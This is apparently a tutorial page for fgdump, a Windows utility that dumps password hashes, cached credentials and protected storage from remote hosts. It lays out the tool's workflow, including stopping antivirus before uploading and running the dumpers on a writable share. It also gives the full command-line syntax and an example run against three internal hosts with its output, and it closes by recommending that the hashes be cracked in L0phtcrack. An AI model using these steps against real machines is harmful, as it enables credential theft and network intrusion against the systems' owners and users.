Fgdump
Fgdump is basically a utility for dumping passwords on Windows
NT/2000/XP/2003/Vista machines. It has all the functionality of
pwdump in-built and can also do a number of other neat things also like
grabbing cached credentials, executing a remote executable and dump the
protected storage on a remote, (or local), host. Users of pwdump are
advised to upgrade to this as soon as possible.
Fgdump comes with a number of add-ons:
- fgexec: remotely installed service that
can run a remote executable. (This is a little limited)
- pwdump6: An updated version of pwdump3e.
- pstgdump: A protected storage dumper.
(IE, Outlook Express passwords etc.).
In essence fgdump carries out the following when trying to grab
passwords from the remote machine:
-
Bind to a remote
machine/target list using IPC$,
-
Stop AV, if it is
installed, -
Locate file shares exposed
on that machine,
-
Find a writable share from
the above list, bind it to a local drive,
-
Upload fgexec, cachedump
-
Run pwdump, (password
history dump included),
-
Run cachedump,
-
Run pstgdump, -
Delete uploaded files from
the file share, -
Unbind the remote file
share, -
Restart AV if it was
running,
-
Unbind from IPC$.
Note: - The current release may have issues if you have another copy of
pwdump and lsaext.dll on, it is best to delete these file. If
older versions of the executable/dll are found fgdump may use them and
possibly cause the target system/s to crash.
Installation:
Download the executable from
here.
Extract the zip file, that's it.
Execution:
fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host |
-f filename} -u Username -p Password | -H filename}
Note: - Username and Password must have administrator credentials
-t Tests for the
presence of antivirus without actually running the password dumps
-c Forces fgdump to skip the cache
dump
-w Forces fgdump to skip the password dump
-s Forces fgdump to skip the
protected storage dump
-r Fgdump forget about existing
pwdump/cachedump files. Default - Skip a host if they already exist.
-v Verbose output. Use twice for greater
effect
-k Keeps the pwdump/cachedump going even if
antivirus is in an unknown state
-l Logs all output to logfile
-T Runs fgdump with the specified number of
parallel threads
-h Name of the single host to perform the
dumps against
-f Reads hosts from a line-separated
file
-H Reads host:username:password from a
line-separated file (per-host credentials)
Example Output:
C:\fgdump-1.5.2\Release>fgdump.exe
-u hacker -p hard_password -c -f target.txt
fgDump 1.5.2 - fizzgig and the
mighty group at foofus.net ****** Written to make j0m0kun's life just a bit easier
Copyright(C) 2006 fizzgig and foofus.net fgdump comes with ABSOLUTELY NO
WARRANTY!
This is free software, and you are welcome to redistribute it under
certain conditions; see the COPYING and README files for more
information.
** Beginning dump on server 192.168.1.17 **
OS (192.168.1.17): Microsoft Windows 2003 Server Service Pack 1 (Build
3790)
Passwords dumped successfully
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage
** Beginning dump on server 192.168.1.18 **
OS (192.168.1.18): Microsoft Windows 2003 Server Service Pack 1 (Build
3790)
Passwords dumped successfully
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage
** Beginning dump on server 192.168.1.124 **
OS (192.168.1.124): Microsoft Windows 2000 Server Service Pack 4 (Build
2195)
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage
Failed servers:
Successful servers:
192.168.1.17
192.168.1.18
192.168.1.124
Total failed: 0
Total successful: 3
C:\fgdump-1.3.2-BETA\Release>dir
26/09/2006 15:20 230 192.168.1.124.cachedump
26/09/2006 15:20 514 192.168.1.124.pwdump
26/09/2006 15:37 605 192.168.1.17.pwdump
26/09/2006 15:37 697 192.168.1.18.pwdump
11/07/2006 15:16 569,344 fgdump.exe
26/09/2006 15:37 64 target.txt
The next step would be to import the pwdump
file, (192.168.1.124.pwdump
etc.), into a program like
L0phtcrack and start your attack against the hashes:

|